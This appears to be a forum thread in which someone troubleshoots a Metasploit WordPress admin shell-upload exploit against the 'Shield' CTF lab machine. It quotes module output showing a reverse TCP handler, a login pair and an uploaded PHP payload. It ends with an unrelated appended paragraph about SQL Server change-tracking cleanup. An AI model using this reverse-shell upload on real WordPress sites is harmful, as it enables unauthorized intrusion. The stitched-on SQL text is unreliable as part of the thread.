Manual cleanup error in shield machine

I started to hack shield machine but it show me this issues [!] This exploit may require manual cleanup of ‘DwPOeuDxdj.php’ on the target
[!] This exploit may require manual cleanup of ‘EQaEWdGVxZ.php’ on the target
[!] This exploit may require manual cleanup of ‘…/EQaEWdGVxZ’ on the target

This is not really an error you need to worry about. It just means that if you were trying to remain hidden, the temporary files metasploit used to trigger the exploit are still on the machine.

If this was a pentest, it would be something the defenders could easily find and possibly cut your pentest short.

Its very rare for it to matter on a CTF.

The rest of the message is more important. If you include that people can help.

How to do it cus this exploit dont wprk i mean it dobt running

What exploit?

Exploit is unix/webapp/wp-admin_shell_upload

Ok - have you checked the options are correct? What responses do you get from MSF?

If it is telling you the exploit needs manual clean up, it probably worked.

And than type exploit completed no session created

[] Started reverse TCP handler on 10.0.2.15:4444
[
] Authenticating with WordPress using admin:P@s5w0rd!..
[+] Authenticated with WordPress
[] Preparing payload…
[
] Uploading payload…
[] Executing the payload at /wordpress/wp-content/plugins/RfMJvigQkp/WwEfUaaoDs.php…
[!] This exploit may require manual cleanup of ‘WwEfUaaoDs.php’ on the target
[!] This exploit may require manual cleanup of ‘RfMJvigQkp.php’ on the target
[!] This exploit may require manual cleanup of ‘…/RfMJvigQkp’ on the target
[
] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) >
and i get this response

Ok - its best to lead with this as it gives more useful information.

Have you confirmed your IP address is 10.0.2.15?

Do you allow port 4444 inbound through your firewall?

If not try ufw allow from (whatever the server IP is) proto tcp to any port 4444 or similar.

My firewall is disabled

Does it work now?

no

is it exactly the same error?

If so, I’d be tempted to try it a few times to see if it works - remember exploits aren’t guaranteed. They take advantage of unexpected situations in the application so often need to run a few times before they work.

Failing that it is a Wordpress upload exploit so you could probably recreate it manually.

Yeah its sam error

Problem solved just type ur lhost 10.10.14.xx.i typed wrong ip

Consider the following scenario:

You create a schema and a table in the schema in Microsoft SQL Server.

You enable change tracking for that table.

You perform manual cleanup by using the sp_flush_CT_internal_table_on_demand command.

In this scenario, the cleanup may fail with an error that states that the table could not be found.

This error occurs because the sp_flush_CT_internal_table_on_demand command does not consider tables with different schemas, such as the tables that are not owned by dbo.

Regards,
Rachel Gomez